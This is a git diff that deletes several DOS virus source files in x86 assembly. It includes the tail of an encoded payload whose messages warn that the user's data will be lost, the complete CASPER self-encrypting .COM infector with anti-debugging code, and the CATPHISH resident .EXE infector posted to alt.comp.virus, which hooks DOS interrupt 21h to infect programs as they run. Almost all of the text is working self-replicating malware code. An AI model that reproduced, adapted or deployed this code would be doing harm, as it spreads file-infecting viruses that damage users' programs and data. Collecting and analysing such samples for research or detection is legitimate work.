0C9h, 84h - db 0DDh, 0D3h, 0D9h, 0D6h, 84h, 0D4h - db 0D6h, 0C9h, 0C7h, 0CDh, 0D3h, 0D9h - db 0D7h, 84h, 0C8h, 0C5h, 0D8h, 0C5h - db 92h, 6Eh, 71h, 84h, 84h, 84h - db 84h, 84h, 0BBh, 0A5h, 0B6h, 0B2h - db 0ADh, 0B2h, 0ABh, 9Eh, 84h, 0ADh - db 0AAh, 84h, 0BDh, 0B3h, 0B9h, 84h - db 0B6h, 0A9h, 0B7h, 0A9h, 0B8h, 84h - db 0B2h, 0B3h, 0BBh, 90h, 84h, 0A5h - db 0B0h, 0B0h, 84h, 0BDh, 0B3h, 0B9h - db 0B6h, 84h, 0A8h, 0A5h, 0B8h, 0A5h - db 84h, 0BBh, 0ADh, 0B0h, 0B0h, 84h - db 0A6h, 0A9h, 84h, 0B0h, 0B3h, 0B7h - db 0B8h, 84h, 91h, 84h, 0AAh, 0B3h - db 0B6h, 0A9h, 0BAh, 0A9h, 0B6h, 84h - db 85h, 85h, 6Eh, 71h, 6Dh, 6Dh - db 84h, 84h, 84h, 0BDh, 0D3h, 0D9h - db 0D6h, 84h, 0A8h, 0C5h, 0D8h, 0C5h - db 84h, 0C8h, 0C9h, 0D4h, 0C9h, 0D2h - db 0C8h, 0D7h, 84h, 0D3h, 0D2h, 84h - db 0C5h, 84h, 0CBh, 0C5h, 0D1h, 0C9h - db 84h, 0D3h, 0CAh, 84h, 0AEh, 0A5h - db 0A7h, 0AFh, 0B4h, 0B3h, 0B8h, 71h - db 6Eh, 71h, 6Eh, 6Dh, 6Dh, 84h - db 84h, 84h, 84h, 84h, 84h, 0A7h - db 0A5h, 0B7h, 0ADh, 0B2h, 0B3h, 84h - db 0A8h, 0A9h, 84h, 0B1h, 0A5h, 0B0h - db 0B8h, 0A9h, 84h, 0AEh, 0A5h, 0A7h - db 0AFh, 0B4h, 0B3h, 0B8h - db 'nqnqmmm-1' - db 1Fh, 6Dh, 2Dh, 31h, 1Fh, 6Dh - db 2Dh, 31h, 1Fh, 6Eh, 71h, 6Dh - db 
6Dh, 6Dh, 3Bh, 0, 3Bh, 6Dh - db 3Bh, 0A3h, 3Bh, 6Dh, 3Bh, 0FFh - db ';nqmmm,1 m,1 m,1 nqmmm' - db 84h, 84h, 84h, 84h, 0A7h, 0B6h - db 0A9h, 0A8h, 0ADh, 0B8h, 0B7h, 84h - db 9Eh, 84h, 99h - db 'nqqnqnmmm' - db 0, 0, 0, 84h, 0A1h, 84h - db 0BDh, 0D3h, 0D9h, 0D6h, 84h, 0A8h - db 0CDh, 0D7h, 0CFh, 6Eh, 71h, 6Dh - db 6Dh, 6Dh, 0A3h, 0A3h, 0A3h, 84h - db 0A1h, 84h, 0B1h, 0DDh, 84h, 0B4h - db 0CCh, 0D3h, 0D2h, 0C9h, 84h, 0B2h - db 0D3h, 92h, 6Eh, 71h, 6Eh, 71h - db 6Dh, 6Dh, 6Dh, 0A5h, 0B2h, 0BDh - db 84h, 0AFh, 0A9h, 0BDh, 84h, 0B8h - db 0B3h, 84h, 0B4h, 0B0h, 0A5h, 0BDh - db 'qnqnqnqnqn' - db 88h, 6Eh, 71h, 0A6h, 0A5h, 0B7h - db 0B8h, 0A5h, 0B6h, 0A8h, 84h, 85h - db 84h, 0BDh, 0D3h, 0D9h, 0C4h, 0D6h - db 0C9h, 84h, 0D0h, 0D9h, 0C7h, 0CFh - db 0DDh, 84h, 0D8h, 0CCh, 0CDh, 0D7h - db 84h, 0D8h, 0CDh, 0D1h, 0C9h, 84h - db 91h, 84h, 0C6h, 0D9h, 0D8h, 84h - db 0CAh, 0D3h, 0D6h, 84h, 0DDh, 0D3h - db 0D9h, 0D6h, 84h, 0D3h, 0DBh, 0D2h - db 84h, 0D7h, 0C5h, 0CFh, 0C9h, 90h - db 84h, 0D2h, 0D3h, 0DBh, 6Eh, 71h - db 0B7h, 0BBh, 0ADh, 0B8h, 0A7h, 0ACh - db 84h, 0B3h, 0AAh, 0AAh, 84h, 0BDh - db 0B3h, 0B9h, 0B6h, 84h, 0A7h, 0B3h - db 0B1h, 0B4h, 0B9h, 0B8h, 0A9h, 0B6h - db 84h, 0A5h, 0B2h, 0A8h, 84h, 0A8h - db 0B3h, 0B2h, 0C4h, 0B8h, 84h, 0B8h - db 0B9h, 0B6h -loc_42: - mov dl,84h - lodsw ; String [si] to ax - mov ax,0B384h - mov dl,84h - mov ax,0B0ADh - mov al,84h - mov ax,0B1B3h - mov bl,0B6h - mov dh,0B3h - mov bx,8584h - test ax,ds:data_33e[di] ; (6AE6:716E=0) - mov [bp+71h],ch - mov dl,0D3h - test ch,[bp+si-3827h] - iret ; Interrupt return - db 0CDh, 0D2h, 0C4h, 84h, 0A7h, 0CCh - db 0C5h, 0D2h, 0C7h, 0C9h, 9Fh, 84h - db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h - db 0D1h, 84h, 0D4h, 0D9h, 0D2h, 0CDh - db 0D7h, 0CCh, 0CDh, 0D2h, 0CBh, 84h - db 0DDh, 0D3h, 0D9h, 84h, 0CAh, 0D3h - db 0D6h, 84h, 0D8h, 0D6h, 0DDh, 0CDh - db 0D2h, 0CBh, 84h, 0D8h, 0D3h, 84h - db 0D8h, 0D6h, 0C5h, 0C7h, 0C9h, 84h - db 0D1h, 0C9h, 84h, 0C8h, 0D3h, 0DBh - db 0D2h, 84h, 85h, 88h, 6Eh, 71h - db 0ACh, 0A5h, 84h, 
0ACh, 0A5h, 84h - db 85h, 85h, 84h, 0BDh, 0D3h, 0D9h - db 84h, 0C5h, 0D7h, 0D7h, 0CCh, 0D3h - db 0D0h, 0C9h, 90h, 84h, 0DDh, 0D3h - db 0D9h, 0C4h, 0DAh, 0C9h, 84h, 0D0h - db 0D3h, 0D7h, 0D8h, 9Eh, 84h, 0D7h - db 0C5h, 0DDh, 84h, 0A6h, 0DDh, 0C9h - db 84h, 0D8h, 0D3h, 84h, 0DDh, 0D3h - db 0D9h, 0D6h, 84h, 0A6h, 0C5h, 0D0h - db 0D0h, 0D7h, 84h, 92h, 92h, 92h - db 6Eh, 71h, 88h, 0CDh, 20h, 0 - -seg_a ends - - - - end start diff --git a/c/CASPER (36).ASM b/c/CASPER (36).ASM deleted file mode 100755 index e157a0b..0000000 --- a/c/CASPER (36).ASM +++ /dev/null 
@@ -1,776 +0,0 @@ -; -; -; Copyright (C) Mark Washburn, 1990. All Rights Reserved -; -; -; Inquires are directed to : -; Mark Washburn -; 4656 Polk Street NE -; Columbia Heights, MN 55421 -; USA -; -; -; -; -code segment public 'CODE' - org 100h -; - assume cs:code,ds:code,es:code -; - -;stopdebug equ 1 ; define this for disassembly trap code -int1vec equ 4 -int3vec equ 12 -; -dta_ptr equ -4 -file_crea equ -8 -file_attr equ -10 -path_start_ptr equ -12 -file_start_ptr equ -14 -RAND_SEED equ -16 -ptr1 equ -18 ; pointer to start of loop code -ptr2 equ -20 ; save data_begin pointer -dat1 equ -22 ; the random code used -dat2 equ -24 ; the decode length plus random length offset, max_msk - ; to make the decode routine more difficult to detect -dat3 equ -26 ; the 'necessary crypt code' mask -; -IFNDEF stopdebug -local_stack equ 26 -max_msk equ 0ffh ; this determines the maximum variance of length -ELSE -nobugptr equ -28 -oldint3 equ -32 -oldint1 equ -36 -local_stack equ 36 -max_msk equ 0ffh ; this determines the maximum variance of length -ENDIF -; -; -; -doscall macro call_type - ifnb - mov ah, call_type - endif - int 21h - endm -; -setloc macro arg1,reg2 - mov [bp + arg1],reg2 - endm -; -getloc macro reg1,arg2 - mov reg1,[bp + arg2] - endm -; -setdat macro arg1,reg2 - mov [si + offset arg1 - offset data_begin],reg2 - endm -; -getdat macro reg1,arg2 - mov reg1,[si + offset arg2 - offset data_begin] - endm -; -regofs macro reg1,arg2 - mov reg1,si - add reg1,offset (arg2 - data_begin) - endm -; -NOBUG1 macro -IFDEF stopdebug - INT 3 - NOP -ENDIF - endm -; -nobug2 macro -IFDEF stopdebug - INT 3 -ENDIF - endm -; -; -start: - jmp entry -; -; -; - MOV AH,0 - INT 021h ; program code -; db 600h-6 dup (0) -; insert utility code here -; -entry: - - -IFDEF stopdebug - call precrypt - db 36 dup (090h) ; calculated length of offset(t41-t10) -ELSE - db 39 dup (090h) ; calculated length of offset(t41-t10) -ENDIF -; -; label the start of encoded section -entry2: - - - - - - -INCLUDE 
utility.asm <------- Manipulation Task Goes Here! - - - - - - - - mov bp,sp ; allocate locals - sub sp,local_stack -; - push cx -movcmd: ; this label is used to locate the next instruction - mov dx,offset data_begin - setloc ptr2,dx ; save - will be modified in 'gencode' -IFDEF stopdebug -; -; save interrupt 1 and 3 vectors -; - push ds - mov ax,0 - push ax - pop ds - cli - mov ax,ds:[int1vec] - setloc oldint1,ax - mov ax,ds:[int1vec+2] - setloc oldint1+2,ax - mov ax,ds:[int3vec] - setloc oldint3,ax - mov ax,ds:[int3vec+2] - setloc oldint3+2,ax - sti - pop ds -; - call bugon -ENDIF - mov si,dx - add si,(offset old_code - offset data_begin) - mov di,0100h - mov cx,03h - cld - repz movsb - mov si,dx - doscall 30h ; check DOS version - cmp al,0 - NOBUG1 ; 0 - jnz cont1 ; DOS > 2.0 - jmp exit -cont1: - push es - doscall 2fh ; get program DTA - NOBUG1 ; 0 - setloc dta_ptr,bx - NOBUG1 ; 0 - setloc dta_ptr+2,es - pop es - regofs dx,my_dta - doscall 1ah ; set new DTA - push es - push si - mov es,ds:[02ch] ; environment address - mov di,0 -loop1: - pop si - push si - add si,(offset path_chars - offset data_begin) - lodsb - mov cx,8000h - repnz scasb - mov cx,4 -loop2: - lodsb - scasb - jnz loop1 - loop loop2 - pop si - pop es - setloc path_start_ptr,di - mov bx,si - add si,offset (file_name-data_begin) - mov di,si - jmp cont6 - nobug2 -next_path: - cmp word ptr [bp + path_start_ptr],0 - jnz cont3 - jmp exit2 - nobug2 -cont3: - push ds - push si - mov ds,es:[002ch] - - mov di,si - mov si,es:[bp+path_start_ptr] - add di,offset (file_name-data_begin) -loop3: - lodsb - cmp al,';' ; 3bh - jz cont4 - cmp al,0 - jz cont5 - stosb - jmp loop3 - nobug2 -cont5: - mov si,0 -cont4: - pop bx - pop ds - mov [bp+path_start_ptr],si - cmp ch,0ffh - jz cont6 - mov al,'\' ; 5ch - stosb -cont6: - mov [bp+file_start_ptr],di - mov si,bx - add si,(offset com_search-offset data_begin) - mov cx,6 - repz movsb - mov si,bx - mov ah,04eh - regofs dx,file_name - mov cx,3 - doscall - jmp cont7 - nobug2 
-next_file: - doscall 04fh -cont7: - jnb cont8 - jmp next_path - nobug2 -cont8: - mov ax,[si+offset(my_dta-data_begin)+016h] ; low time byte - and al,01fh - cmp al,01fh - jz next_file -IFNDEF stopdebug - cmp word ptr [si+offset(my_dta-data_begin)+01ah],0fa00h - ; file length compared; need 1.5 k spare, see rnd off -ELSE - cmp word ptr [si+offset(my_dta-data_begin)+01ah],0f800h -ENDIF - jz next_file ; with virus length - cmp word ptr [si+offset(my_dta-data_begin)+01ah],0ah - ; file to short - jz next_file - mov di,[bp+file_start_ptr] - push si - add si,offset(my_dta-data_begin+01eh) -move_name: - lodsb - stosb - cmp al,0 - jnz move_name - pop si - mov ax,04300h - regofs dx,file_name - doscall - setloc file_attr,cx - mov ax,04301h - and cx,0fffeh - regofs dx,file_name - doscall - mov ax,03d02h - regofs dx,file_name - doscall - jnb cont9 - jmp exit3 - nobug2 -cont9: - mov bx,ax - mov ax,05700h - doscall - setloc file_crea,cx - setloc file_crea+2,dx -cont10: - mov ah,3fh - mov cx,3 - regofs dx,old_code - doscall - NOBUG1 ; 1 - jb cont98 - NOBUG1 - cmp ax,3 - NOBUG1 - jnz cont98 - NOBUG1 - mov ax,04202h - NOBUG1 ;1 - mov cx,0 - mov dx,0 - doscall - jnb cont99 -cont98: - jmp exit4 -cont99: - NOBUG1 ; 2 - push bx ; save file handle - NOBUG1 - mov cx,ax - push cx - NOBUG1 - sub ax,3 - NOBUG1 - setdat jump_code+1,ax - add cx,(offset data_begin-offset entry+0100h) - NOBUG1 - mov di,si - NOBUG1 - sub di,offset data_begin-offset movcmd-1 - NOBUG1 - mov [di],cx -; - doscall 02ch ; seed the random number generator - xor dx,cx - NOBUG1 - setloc rand_seed,dx - NOBUG1 ; 2 - call random - NOBUG1 ; 3 - getloc ax,rand_seed - NOBUG1 ; 3 - and ax,max_msk ; add a random offset to actual length - NOBUG1 ; 3 - add ax,offset (data_end-entry2) ; set decode length - NOBUG1 ; 3 - setloc dat2,ax ; save the decode length - NOBUG1 ; 3 - setdat (t13+1),ax ; set decode length in 'mov cx,xxxx' - pop cx ; restore the code length of file to be infected - NOBUG1 ; 3 - add cx,offset (entry2-entry+0100h) 
; add the length - ; of uncoded area plus file offset - setdat (t11+1),cx ; set decode begin in 'mov di,xxxx' - NOBUG1 ; 3 - call random - getloc ax,rand_seed - NOBUG1 ; 3 - setloc dat1,ax ; save this random key in dat1 - setdat (t12+1),ax ; set random key in 'mov ax,xxxx' - NOBUG1 ; 3 - mov di,si - NOBUG1 ; 3 - sub di,offset (data_begin-entry) - NOBUG1 ; 3 - mov bx,si - add bx,offset (l11-data_begin) ; table L11 address - mov word ptr [bp+dat3],000000111b ; required routines - call gen2 ; generate first part of decrypt - setloc ptr1,di ; save the current counter to resolve 'loop' - add bx,offset (l21-l11) ; add then next tables' offset - NOBUG1 ; 3 - mov word ptr [bp+dat3],010000011b ; required plus 'nop' - NOBUG1 ; 3 - call gen2 ; generate second part of decrypt - add bx,offset (l31-l21) ; add the next offset - NOBUG1 - call gen2 ; generate third part of decrypt - mov cx,2 ; store the loop code - getloc si,ptr2 - NOBUG1 ; 3 - add si,offset (t40-t10) ; point to the code - repz movsb ; move the code - getloc ax,ptr1 ; the loop address pointer - sub ax,di ; the current address - dec di ; point to the jump address - stosb ; resolve the jump -; fill in the remaining code -l991: - getloc cx,ptr2 ; get the data_begin pointer - sub cx,offset (data_begin-entry2) ; locate last+1 entry - cmp cx,di ; are we there yet? 
- je l992 ; if not then fill some more space - mov dx,0h ; any code is ok - call gencode ; generate the code - jmp l991 - nobug2 -l992: - getloc si,ptr2 ; restore si to point to data area ; - push si - mov di,si - NOBUG1 ; 4 - mov cx,offset(end1-begin1) ; move code - add si,offset(begin1-data_begin) - NOBUG1 ; 4 - add di,offset(data_end-data_begin+max_msk) ; add max_msk - mov dx,di ; set subroutine start - repz movsb ; move the code - pop si - pop bx ; restore handle - call setrtn ; find this address - add ax,06h ; <- the number necessary for proper return - push ax - jmp dx ; continue with mask & write code -; continue here after return from mask & write code - NOBUG1 ; 4 - jb exit4 - cmp ax,offset(data_end-entry) - NOBUG1 ; 4 - jnz exit4 - mov ax,04200h - mov cx,0 - mov dx,0 - doscall - jb exit4 - mov ah,040h - mov cx,3 - NOBUG1 ; 4 - regofs dx,jump_code - doscall -exit4: - getloc dx,file_crea+2 - getloc cx,file_crea - and cx,0ffe0h - or cx,0001fh - mov ax,05701h - doscall - doscall 03Eh ; close file -exit3: - mov ax,04301h - getloc cx,file_attr - regofs dx,file_name - doscall -exit2: - push ds - getloc dx,dta_ptr - getloc ds,dta_ptr+2 - doscall 01ah - pop ds -exit: - pop cx - xor ax,ax - xor bx,bx - xor dx,dx - xor si,si - mov sp,bp ; deallocate locals - mov di,0100h - push di -IFDEF stopdebug - call bugoff -ENDIF - ret -; -; common subroutines -; -; -random proc near -; - getloc cx,rand_seed ; get the seed - xor cx,813Ch ; xor random pattern - add cx,9248h ; add random pattern - ror cx,1 ; rotate - ror cx,1 ; three - ror cx,1 ; times. - setloc rand_seed,cx ; put it back - and cx,7 ; ONLY NEED LOWER 3 BITS - push cx - inc cx - xor ax,ax - stc - rcl ax,cl - pop cx - ret ; return -; -random endp -; -setrtn proc near -; - pop ax ; ret near - push ax - ret -; -setrtn endp -; -gencode proc near -; -l999: - call random - test dx,ax ; has this code been used yet? 
- jnz l999 ; if this code was generated - try again - or dx,ax ; set the code as used in dx - mov ax,cx ; the look-up index - sal ax,1 - push ax - xlat - mov cx,ax ; the count of instructions - pop ax - inc ax - xlat - add ax,[bp+ptr2] ; ax = address of code to be moved - mov si,ax - repz movsb ; move the code into place - ret -; -gencode endp -; -gen2 proc near -; - mov dx,0h ; used code -l990: - call gencode - mov ax,dx ; do we need more code - and ax,[bp+dat3] ; the mask for the required code - cmp ax,[bp+dat3] - jne l990 ; if still need required code - loop again - ret -; -gen2 endp -; -IFDEF stopdebug -doint3: - push bx - mov bx,sp - push ax - push si - mov si,word ptr [bx+02] - inc word ptr [bx+02] ; point to next address - setloc nobugptr,si - lodsb ; get the byte following int 3 - xor byte ptr [si],al - mov al,[bx+7] ; set the trap flag - or al,1 - mov [bx+7],al - pop si - pop ax - pop bx - iret -; -doint1: - push bx - mov bx,sp - push ax - push si - getloc si,nobugptr - lodsb - xor byte ptr [si],al - mov al,[bx+7] ; clear the trap flag - and al,0feh - mov [bx+7],al - pop si - pop ax - pop bx -bugiret: - iret -; -bugon: - pushf - push ds - push ax - mov ax,0 - push ax - pop ds - getloc ax,ptr2 - sub ax,offset(data_begin-doint3) - cli - mov ds:[int3vec],ax - getloc ax,ptr2 - sub ax,offset(data_begin-doint1) - mov ds:[int1vec],ax - push cs - pop ax - mov ds:[int1vec+2],ax - mov ds:[int3vec+2],ax - sti - pop ax - pop ds - popf - ret -; -bugoff: - pushf - push ds - push ax - mov ax,0 - push ax - pop ds - - getloc ax,oldint3 - cli - mov ds:[int3vec],ax - getloc ax,oldint1 - mov ds:[int1vec],ax - getloc ax,oldint1+2 - mov ds:[int1vec+2],ax - getloc ax,oldint3+2 - mov ds:[int3vec+2],ax - sti - - pop ax - pop ds - popf - ret -; -ENDIF -; -; -; the data area -; -data_begin label near -; -T10 LABEL NEAR -T11: MOV DI,0FFFFH -T12: MOV AX,0FFFFH -T13: MOV CX,0FFFFH -T14: CLC -T15: CLD -T16: INC SI -T17: DEC BX -T18: NOP -T19 LABEL NEAR -; -T20 LABEL NEAR -T21: XOR 
[DI],AX -T22: XOR [DI],CX -T23: XOR DX,CX -T24: XOR BX,CX -T25: SUB BX,AX -T26: SUB BX,CX -T27: SUB BX,DX -T28: NOP -T29 LABEL NEAR -; -T30 LABEL NEAR -T31: INC AX -T32: INC DI -T33: INC BX -T34: INC SI -T35: INC DX -T36: CLC -T37: DEC BX -T38: NOP -T39 LABEL NEAR -; -T40: LOOP T20 -T41 LABEL NEAR -; -L11: DB OFFSET (T12-T11),OFFSET (T11-data_begin) -L12: DB OFFSET (T13-T12),OFFSET (T12-data_begin) -L13: DB OFFSET (T14-T13),OFFSET (T13-data_begin) -L14: DB OFFSET (T15-T14),OFFSET (T14-data_begin) -L15: DB OFFSET (T16-T15),OFFSET (T15-data_begin) -L16: DB OFFSET (T17-T16),OFFSET (T16-data_begin) -L17: DB OFFSET (T18-T17),OFFSET (T17-data_begin) -L18: DB OFFSET (T19-T18),OFFSET (T18-data_begin) -; -L21: DB OFFSET (T22-T21),OFFSET (T21-data_begin) -L22: DB OFFSET (T23-T22),OFFSET (T22-data_begin) -L23: DB OFFSET (T24-T23),OFFSET (T23-data_begin) -L24: DB OFFSET (T25-T24),OFFSET (T24-data_begin) -L25: DB OFFSET (T26-T25),OFFSET (T25-data_begin) -L26: DB OFFSET (T27-T26),OFFSET (T26-data_begin) -L27: DB OFFSET (T28-T27),OFFSET (T27-data_begin) -L28: DB OFFSET (T29-T28),OFFSET (T28-data_begin) -; -L31: DB OFFSET (T32-T31),OFFSET (T31-data_begin) -L32: DB OFFSET (T33-T32),OFFSET (T32-data_begin) -L33: DB OFFSET (T34-T33),OFFSET (T33-data_begin) -L34: DB OFFSET (T35-T34),OFFSET (T34-data_begin) -L35: DB OFFSET (T36-T35),OFFSET (T35-data_begin) -L36: DB OFFSET (T37-T36),OFFSET (T36-data_begin) -L37: DB OFFSET (T38-T37),OFFSET (T37-data_begin) -L38: DB OFFSET (T39-T38),OFFSET (T38-data_begin) -; -; -; -; this routine is relocated after the end of data area -; this routine encrypts, writes, and decrypts the virus code -; -begin1: - getloc cx,dat2 ; get off (data_end-entry2) plus max_msk - getloc ax,dat1 ; get decode ket - mov di,si ; and set the begin encrypt address - sub di,offset (data_begin-entry2) - call crypt - mov ah,040h - mov cx,offset data_end-offset entry - mov dx,si - sub dx,offset data_begin-offset entry - doscall - pushf ; save the status of the write - push ax 
- getloc cx,dat2 ; get off (data_end-entry2) plus max_msk - getloc ax,dat1 - mov di,si - sub di,offset (data_begin-entry2) - call crypt - pop ax ; restore the DOS write's status - popf - ret -; -crypt: - xor [di],ax - xor [di],cx - inc ax - inc di - loop crypt - ret -end1: -; -; global work space and constants -; -old_code: db 090h,090h,090h -jump_code: db 0e9h,0,0 -com_search: db '*.COM',0 -path_chars: db 'PATH=' -file_name: db 40h DUP (0) -my_dta: db 2Bh DUP (0) - db 0,0,0 - -data_end label near -IFDEF stopdebug -; -scan_bytes db 0CCh,090h -; -precrypt: - mov bp,sp ; allocate locals - sub sp,local_stack - doscall 02ch ; seed the random number generator - xor dx,cx - setloc rand_seed,dx - call random - mov di,offset start - push ds - pop es -lp999: - mov cx,08000h - mov si,offset scan_bytes - lodsb - repnz scasb - cmp cx,0 - je done998 - cmp di,offset data_end - jge done998 - lodsb - scasb - jnz lp999 - call random - getloc ax,rand_seed - dec di - mov [di],al - inc di - xor [di],al - inc di ; skip the masked byte - jmp short lp999 -done998: - mov sp,bp - ret -ENDIF - -code ends - end start - \ No newline at end of file diff --git a/c/CATPHISH (37).ASM b/c/CATPHISH (37).ASM deleted file mode 100755 index a8632e1..0000000 --- a/c/CATPHISH (37).ASM +++ /dev/null 
@@ -1,552 +0,0 @@ -From smtp Sun Jan 29 16:25 EST 1995 -Received: from ids.net by POBOX.jwu.edu; Sun, 29 Jan 95 16:25 EST -Date: Sun, 29 Jan 1995 16:18:52 -0500 (EST) -From: ids.net!JOSHUAW (JOSHUAW) -To: pobox.jwu.edu!joshuaw -Content-Length: 11874 -Content-Type: text -Message-Id: <950129161852.10074@ids.net> -Status: RO - -To: joshuaw@pobox.jwu.edu -Subject: (fwd) CATPHISH.ASM -Newsgroups: alt.comp.virus - -Path: paperboy.ids.net!uunet!cs.utexas.edu!uwm.edu!msunews!news.mtu.edu!news.mtu.edu!not-for-mail -From: jdmathew@mtu.edu (Icepick) -Newsgroups: alt.comp.virus -Subject: CATPHISH.ASM -Date: 26 Jan 1995 13:06:15 -0500 -Organization: Michigan Technological University -Lines: 486 -Message-ID: <3g8oan$54g@maxwell11.ee> -NNTP-Posting-Host: maxwell11.ee.mtu.edu -X-Newsreader: TIN [version 1.2 PL1] - - - -name VIRUSTEST - title -code segment - assume cs:code, ds:code, es:code - org 100h - -;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -; The Catphish Virus. -; -; The Catphish virus is a resident .EXE infector. -; Size: 678 bytes (decimal). -; No activation (bomb). -; Saves date and file attributes. -; -; If assembling, check_if_resident jump must be marked over -; with nop after first execution (first execution will hang -; system). -; -; *** Source is made available to learn from, not to -; change author's name and claim credit! *** - -start: - call setup ; Find "delta offset". -setup: - pop bp - sub bp, offset setup-100h - jmp check_if_resident ; See note above about jmp! - -pre_dec_em: - mov bx,offset infect_header-100h - add bx,bp - mov cx,endcrypt-infect_header - -ror_em: - mov dl,byte ptr cs:[bx] - ror dl,1 ; Decrypt virus code - mov byte ptr cs:[bx],dl ; by rotating right. - inc bx - loop ror_em - - jmp check_if_resident - -;--------------------------------- Infect .EXE header ----------------------- -; The .EXE header modifying code below is my reworked version of -; Dark Angel's code found in his Phalcon/Skism virus guides. 
- - -infect_header: - push bx - push dx - push ax - - - - mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs - ; ^---make sure you don't destroy the file handle - mov cl, 4 ; Multiply by 16. Won't - shl bx, cl ; work with headers > 4096 - ; bytes. Oh well! - sub ax, bx ; Subtract header size from - sbb dx, 0 ; file size - ; Now DX:AX is loaded with file size minus header size - mov cx, 10h ; DX:AX/CX = AX Remainder DX - div cx - - - mov word ptr [buffer+14h-100h], dx ; IP Offset - mov word ptr [buffer+16h-100h], ax ; CS Displacement in module - - - mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS - mov word ptr [buffer+10h-100h], 0A000h ; Starting SP - - pop ax - pop dx - - add ax, endcode-start ; add virus size - cmp ax, endcode-start - jb fix_fault - jmp execont - - -war_cry db 'Cry Havoc, and let slip the Dogs of War!',0 -v_name db '[Catphish]',0 ; Virus name. -v_author db 'FirstStrike',0 ; Me. -v_stuff db 'Kraft!',0 - - -fix_fault: - add dx,1d - -execont: - push ax - mov cl, 9 - shr ax, cl - ror dx, cl - stc - - adc dx, ax - pop ax - and ah, 1 - - - mov word ptr [buffer+4-100h], dx ; Fix-up the file size in - mov word ptr [buffer+2-100h], ax ; the EXE header. - - pop bx - retn ; Leave subroutine - -;---------------------------------------------------------------------------- - - -check_if_resident: - push es - xor ax,ax - mov es,ax - - cmp word ptr es:[63h*4],0040h ; Check to see if virus - jnz grab_da_vectors ; is already resident - jmp exit_normal ; by looking for a 40h - ; signature in the int 63h - ; offset section of - ; interrupt table. - -grab_da_vectors: - - mov ax,3521h ; Store original int 21h - int 21h ; vector pointer. - mov word ptr cs:[bp+dos_vector-100h],bx - mov word ptr cs:[bp+dos_vector+2-100h],es - - - -load_high: - push ds - -find_chain: ; Load high routine that - ; uses the DOS internal - mov ah,52h ; table function to find - int 21h ; start of MCB and then - ; scales up chain to - mov ds,es: word ptr [bx-2] ; find top. 
(The code - assume ds:nothing ; is long, but it is the - ; only code that would - xor si,si ; work when an infected - ; .EXE was to be loaded -Middle_check: ; into memory. - - cmp byte ptr ds:[0],'M' - jne Check4last - -add_one: - mov ax,ds - add ax,ds:[3] - inc ax - - mov ds,ax - jmp Middle_check - -Check4last: - cmp byte ptr ds:[0],'Z' - jne Error - mov byte ptr ds:[0],'M' - sub word ptr ds:[3],(endcode-start+15h)/16h+1 - jmp add_one - -error: - mov byte ptr ds:[0],'Z' - mov word ptr ds:[1],008h - mov word ptr ds:[3],(endcode-start+15h)/16h+1 - - push ds - pop ax - inc ax - push ax - pop es - - - - - -move_virus_loop: - mov bx,offset start-100h ; Move virus into carved - add bx,bp ; out location in memory. - mov cx,endcode-start - push bp - mov bp,0000h - -move_it: - mov dl, byte ptr cs:[bx] - mov byte ptr es:[bp],dl - inc bp - inc bx - loop move_it - pop bp - - - -hook_vectors: - - mov ax,2563h ; Hook the int 21h vector - mov dx,0040h ; which means it will - int 21h ; point to virus code in - ; memory. - mov ax,2521h - mov dx,offset virus_attack-100h - push es - pop ds - int 21h - - - - - pop ds - - - -exit_normal: ; Return control to - pop es ; infected .EXE - mov ax, es ; (Dark Angle code.) - add ax, 10h - add word ptr cs:[bp+OrigCSIP+2-100h], ax - - cli - add ax, word ptr cs:[bp+OrigSSSP+2-100h] - mov ss, ax - mov sp, word ptr cs:[bp+OrigSSSP-100h] - sti - - xor ax,ax - xor bp,bp - -endcrypt label byte - - db 0eah -OrigCSIP dd 0fff00000h -OrigSSSP dd ? - -exe_attrib dw ? -date_stamp dw ? -time_stamp dw ? - - - -dos_vector dd ? - -buffer db 18h dup(?) ; .EXE header buffer. - - - - -;---------------------------------------------------------------------------- - - -virus_attack proc far - assume cs:code,ds:nothing, es:nothing - - - cmp ax,4b00h ; Infect only on file - jz run_kill ; executions. 
- -leave_virus: - jmp dword ptr cs:[dos_vector-100h] - - - -run_kill: - call infectexe - jmp leave_virus - - - - - -infectexe: ; Same old working horse - push ax ; routine that infects - push bx ; the selected file. - push cx - push es - push dx - push ds - - - - mov cx,64d - mov bx,dx - -findname: - cmp byte ptr ds:[bx],'.' - jz o_k - inc bx - loop findname - -pre_get_out: - jmp get_out - -o_k: - cmp byte ptr ds:[bx+1],'E' ; Searches for victims. - jnz pre_get_out - cmp byte ptr ds:[bx+2],'X' - jnz pre_get_out - cmp byte ptr ds:[bx+3],'E' - jnz pre_get_out - - - - -getexe: - mov ax,4300h - call dosit - - mov word ptr cs:[exe_attrib-100h],cx - - mov ax,4301h - xor cx,cx - call dosit - -exe_kill: - mov ax,3d02h - call dosit - xchg bx,ax - - mov ax,5700h - call dosit - - mov word ptr cs:[time_stamp-100h],cx - mov word ptr cs:[date_stamp-100h],dx - - - - push cs - pop ds - - mov ah,3fh - mov cx,18h - mov dx,offset buffer-100h - call dosit - - cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker - jnz infectforsure ; of 1993h in .EXE - jmp close_it ; header checksum - ; position. -infectforsure: - call move_f_ptrfar - - push ax - push dx - - - call store_header - - pop dx - pop ax - - call infect_header - - - push bx - push cx - push dx - - - mov bx,offset infect_header-100h - mov cx,(endcrypt)-(infect_header) - -rol_em: ; Encryption via - mov dl,byte ptr cs:[bx] ; rotating left. 
- rol dl,1 - mov byte ptr cs:[bx],dl - inc bx - loop rol_em - - pop dx - pop cx - pop bx - - mov ah,40h - mov cx,endcode-start - mov dx,offset start-100h - call dosit - - - mov word ptr cs:[buffer+12h-100h],1993h - - - call move_f_ptrclose - - mov ah,40h - mov cx,18h - mov dx,offset buffer-100h - call dosit - - mov ax,5701h - mov cx,word ptr cs:[time_stamp-100h] - mov dx,word ptr cs:[date_stamp-100h] - call dosit - -close_it: - - - mov ah,3eh - call dosit - -get_out: - - - pop ds - pop dx - -set_attrib: - mov ax,4301h - mov cx,word ptr cs:[exe_attrib-100h] - call dosit - - - pop es - pop cx - pop bx - pop ax - - retn - -;---------------------------------- Call to DOS int 21h --------------------- - -dosit: ; DOS function call code. - pushf - call dword ptr cs:[dos_vector-100h] - retn - 